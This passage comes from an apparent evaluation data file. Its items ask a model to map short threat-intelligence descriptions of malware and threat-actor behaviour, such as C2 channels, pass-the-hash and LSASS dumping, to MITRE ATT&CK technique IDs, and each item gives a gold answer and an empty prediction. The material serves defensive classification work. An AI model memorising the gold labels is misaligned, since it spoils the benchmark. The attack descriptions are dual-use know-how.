vulnerabilities in public-facing infrastructure such as Microsoft Exchange Servers.", + "gold": "- T1190: Exploit Public-Facing Application", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Filename Part-II.doc File Size 10156713 bytes MD5 e32668e569362c96cc56db368b7e821e SHA1 dadc493abbe3e21610539e1d5a42f523626a6132 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe\n\t - T1036: Masquerading\n- Text: Keydnap uses a Launch Agent to persist.\n\t - T1543.001: Create or Modify System Process - Launch Agent\n- Text: Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. It then redirects the user to install a \u201cFont Manager\u201d extension from the Chrome Web Store, as seen in Figure 2. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4: Given the threat actor\u2019s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site. They spent significant time and resources doing reconnaissance on their targets, as evidenced by the comments left on the Chrome extension page\n\t - T1176: Browser Extensions\n", + "input": "FatDuke has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SideTwist has the ability to download additional files.\n\t - T1105: Ingress Tool Transfer\n- Text: Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Silence has used VBS scripts.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Pteranodon can download and execute additional files.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: No matching sample found for T1562.007\n- Text: provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet\n\t - T1205.001: Traffic Signaling - Port Knocking\n", + "input": "Kimsuky has been observed disabling the system firewall.", + "gold": "- T1562.004: Impair Defenses - Disable or Modify System Firewall", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Calisto uses launchctl to enable screen sharing on the victim\u2019s machine.\n\t - T1569.001: System Services - Launchctl\n- Text: When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the \"/Library/LaunchDaemons/\" folder with the \"RunAtLoad\" key set to \"true\" establishing persistence as a Launch Daemon.\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n- Text: MacSpy stores itself in \"~/Library/.DS_Stores/\"\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "LoudMiner launched the QEMU services in the \"/Library/LaunchDaemons/\" folder using \"launchctl\". It also uses \"launchctl\" to unload all Launch Daemons when updating to a newer version of LoudMiner.", + "gold": "- T1569.001: System Services - Launchctl", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: encrypts the collected files using 3-DES.\n\t - T1486: Data Encrypted for Impact\n- Text: Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe \u2014 a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands. Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data\n\t - T1027: Obfuscated Files or Information\n\t - T1560: Archive Collected Data\n", + "input": "Seth-Locker can encrypt files on a targeted system, appending them with the suffix .seth.", + "gold": "- T1486: Data Encrypted for Impact", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.\n\t - T1204.001: User Execution - Malicious Link\n- Text: In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender. The payloads themselves are rather interesting, as the developer wraps the malicious code with legitimate source code freely available online\n\t - T1204.002: User Execution - Malicious File\n- Text: The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Ember Bear has attempted to lure users to click on a malicious link within a spearphishing email.", + "gold": "- T1204.001: User Execution - Malicious Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole has been configured with several servers available for alternate C2 communications.\n\t - T1008: Fallback Channels\n- Text: attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware.\n\t - T1104: Multi-Stage Channels\n- Text: APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.\n\t - T1561.002: Disk Wipe - Disk Structure Wipe\n", + "input": "ShimRat has used a secondary C2 location if the first was unavailable.", + "gold": "- T1008: Fallback Channels", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.\n\t - T1027: Obfuscated Files or Information\n- Text: POWRUNER can use base64 encoded C2 communications.\n\t - T1001: Data Obfuscation\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another\u2019s process token just for the execution of a command\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n", + "input": "Empire has the ability to obfuscate commands using \"Invoke-Obfuscation\".", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GreyEnergy encrypts communications using RSA-2048.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: can communicate over a reverse proxy using SOCKS5.\n\t - T1090: Proxy\n- Text: Winnti malware handles outbound communications using multiple protocols including: ICMP, HTTP, as well as custom TCP and UDP protocols. Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports\n\t - T1071.001: Application Layer Protocol - Web Protocols\n\t - T1095: Non-Application Layer Protocol\n", + "input": "Operation Wocao's proxy implementation \"Agent\" can upgrade the socket in use to a TLS socket.", + "gold": "- T1573.002: Encrypted Channel - Asymmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit.\n\t - T1570: Lateral Tool Transfer\n- Text: has exfiltrated files stolen from local systems.\n\t - T1005: Data from Local System\n- Text: A file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.\n\t - T1025: Data from Removable Media\n", + "input": "Turla RPC backdoors can upload files from victim machines.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature already discontinued by Windows), a malicious loader (in \"C:\\ProgramData\\Apple\\Update\\wab32res.dll\"), and an encrypted configuration file\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: ShimRat can download additional files.\n\t - T1105: Ingress Tool Transfer\n- Text: Carbanak has named malware \"svchost.exe,\" which is the name of the Windows shared service host program.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "BackdoorDiplomacy has dropped legitimate software onto a compromised host and used it to execute malicious DLLs.", + "gold": "- T1055.001: Process Injection - Dynamic-link Library Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TajMahal has the ability to use the open source libraries XZip/Xunzip and zlib to compress files.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: MuddyWater has used tools to encode C2 communications including Base64 encoding.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: The group has been known to compress data before exfiltration.\n\t - T1560: Archive Collected Data\n", + "input": "The ZLib backdoor compresses communications using the standard Zlib compression library.", + "gold": "- T1560.002: Archive Collected Data - Archive via Library", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1021.004: Remote Services - SSH\n\t - T1018: Remote System Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n- Text: When the attackers need to send a file or command to the victim machine, they place them to the folder named d in the victim\u2019s Dropbox folder. The malware retrieves this folder and downloads all its contents to the working folder\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- Text: compresses output data generated by command execution with a custom implementation of the Lempel\u2013Ziv\u2013Welch (LZW) algorithm.\n\t - T1560: Archive Collected Data\n", + "input": "ccf32 has used `xcopy \\\\\\c$\\users\\public\\path.7z c:\\users\\public\\bin\\.7z /H /Y` to archive collected files.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment. The dropper then attempts to open the service manager on each remote system to start the RemoteRegistry service, which it will connect to using RegConnectRegistryW. The dropper then checks to see if it has administrator privileges on the remote system by attempting to open \"\\system32\\csrss.exe\", which allows it to determine if it can write its payload to the \"\\system32\" folder on the remote system. Scheduled tasks require a time in which the task will run, which the dropper determines by calling the function NetRemoteTOD to obtain the time of day from the remote system. While completely speculative, the word \u201cshinu\u201d used as a parameter could be a reference to the Arabic slang for the word \u201cwhat\u201d, as well as a reference to a village name in northwestern Iran. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. The current attack campaign has several TTP overlaps with the original Shamoon campaign, especially from a targeting and timing perspective\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: FinFisher creates a new Windows service with the malicious executable for persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Blue Mockingbird has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n", + "input": "Kwampirs establishes persistence by adding a new service with the display name \"WMI Performance Adapter Extension\" in an attempt to masquerade as a legitimate WMI service.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has acquired servers to host their malicious tools.\n\t - T1583.004: Acquire Infrastructure - Server\n- Text: The attackers configured multiple C2 servers for various stages, reusing several scripts we\u2019ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns\n\t - T1584.004: Compromise Infrastructure - Server\n- Text: APT1 has registered hundreds of domains for use in operations.\n\t - T1583.001: Acquire Infrastructure - Domains\n", + "input": "For Operation Wocao, the threat actors purchased servers with Bitcoin to use during the operation.", + "gold": "- T1583.004: Acquire Infrastructure - Server", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A module in Prikormka collects information from the victim about Windows OS version, computer name, battery info, and physical memory.\n\t - T1082: System Information Discovery\n- Text: Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.\n\t - T1049: System Network Connections Discovery\n- Text: can gather the victim user name.\n\t - T1033: System Owner/User Discovery\n", + "input": "POORAIM can identify system information, including battery status.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).\n\t - T1027: Obfuscated Files or Information\n- Text: Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. All these builds exhibit common functionality.Agent.btz is a DLL file. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", + "input": "Kazuar is obfuscated using the open source ConfuserEx protector. Kazuar also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount\n\t - T1078.002: Valid Accounts - Domain Accounts\n\t - T1550.001: Use Alternate Authentication Material - Application Access Token\n- Text: Industroyer can use supplied user credentials to execute processes and stop services.\n\t - T1078: Valid Accounts\n- Text: APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.\n\t - T1078.004: Valid Accounts - Cloud Accounts\n", + "input": "APT3 leverages valid accounts after gaining credentials for use within the victim domain.", + "gold": "- T1078.002: Valid Accounts - Domain Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 accessed email accounts using Outlook Web Access.\n\t - T1114.002: Email Collection - Remote Email Collection\n- Text: LightNeuron can store email data in files and directories specified in its configuration, such as \"C:\\Windows\\ServiceProfiles\\NetworkService\\appdata\\Local\\Temp\\\".\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Frankenstein has collected information via Empire, which is automatically sent the data back to the adversary's C2.\n\t - T1020: Automated Exfiltration\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "Dragonfly has collected data from local victim systems.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In Carbanak attacks, the groups\u2019 attacks can involve logging into services that accept remote connections and using stolen password hashes through the \u201cpass the hash\u201d method\n\t - T1550.002: Use Alternate Authentication Material - Pass the Hash\n\t - T1110.002: Brute Force - Password Cracking\n- Text: Some SeaDuke samples have a module to use pass the ticket with Kerberos for authentication.\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n- Text: secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.003: OS Credential Dumping - NTDS\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "GALLIUM used dumped hashes to authenticate to other machines via pass the hash.", + "gold": "- T1550.002: Use Alternate Authentication Material - Pass the Hash", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SLOTHFULMEDIA has the capability to enumerate services.\n\t - T1007: System Service Discovery\n- Text: We have observed the following capabilities of this payload: Get drive information Read files Write files Delete files Move files Spawn processes Create directories Reaver TCP Payload The malicious CPL payload of Reaver has the following three exported functions: ServiceMain CPlApplet DllEntryPoint When the malware is initially loaded, DllEntryPoint will be called, which in turn will call a function that is responsible for decompressing a blob of data\n\t - T1005: Data from Local System\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1083: File and Directory Discovery\n- Text: is capable of enumerating application windows.\n\t - T1010: Application Window Discovery\n", + "input": "ZLib has the ability to enumerate system information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: By applying two specific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was very similar to the QUADAGENT payloads delivered in the attacks discussed in this blog\n\t - T1027: Obfuscated Files or Information\n", + "input": "Nebulae can use RC4 and XOR to encrypt C2 communications.", + "gold": "- T1573.001: Encrypted Channel - Symmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560: Archive Collected Data\n- Text: Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1074.002: Data Staged - Remote Data Staging\n- Text: writes multiple outputs to a TMP file using the >> method.\n\t - T1074: Data Staged\n", + "input": "APT3 has been known to stage files for exfiltration in a single location.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber 